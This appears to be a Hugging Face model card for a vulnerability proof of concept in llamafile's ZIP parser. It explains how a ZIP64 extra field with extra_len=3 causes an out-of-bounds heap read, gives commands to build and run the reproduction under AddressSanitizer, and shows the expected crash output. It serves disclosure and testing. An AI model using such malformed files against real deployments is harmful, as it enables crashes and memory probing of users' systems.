YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
Llamafile ZIP64 Extra Field OOB Read PoC
This PoC targets mozilla-ai/llamafile commit 6e7e1034ea20dce4b5c9c29d6858e8bb98b76339.
llamafile/zip.c parses ZIP64 extra fields with:
for (; p + ZIP_EXTRA_SIZE(p) <= pe; p += ZIP_EXTRA_SIZE(p))
ZIP_EXTRA_SIZE(p) reads ZIP_READ16(p + 2) before the loop checks that at least four bytes remain in the extra field. A central-directory entry with extra_len=3 and relative_offset=0xffffffff causes a heap-buffer-overflow read while resolving the .gguf entry offset.
Reproduce locally from a fresh checkout:
python3 make_llamafile_zip64_extra_oob.py
cc -fsanitize=address -fno-omit-frame-pointer -g -O1 -I. -include stdint.h \
repro_llamafile_zip64_extra_oob.c llamafile/zip.c \
-o poc/repro_llamafile_zip64_extra_oob
ASAN_OPTIONS=abort_on_error=0:halt_on_error=1 \
./poc/repro_llamafile_zip64_extra_oob poc/llamafile-zip64-extra-oob.llamafile
Expected result:
about to parse ZIP64 extra field for x.gguf
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 2
#0 ... in get_zip_cfile_offset llamafile/zip.c:54
The PoC file SHA256 is:
946c2667e00269e873d6346aaa76bd5700cef13fa08e560801758ef97d03c9db
- Downloads last month
- 5
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support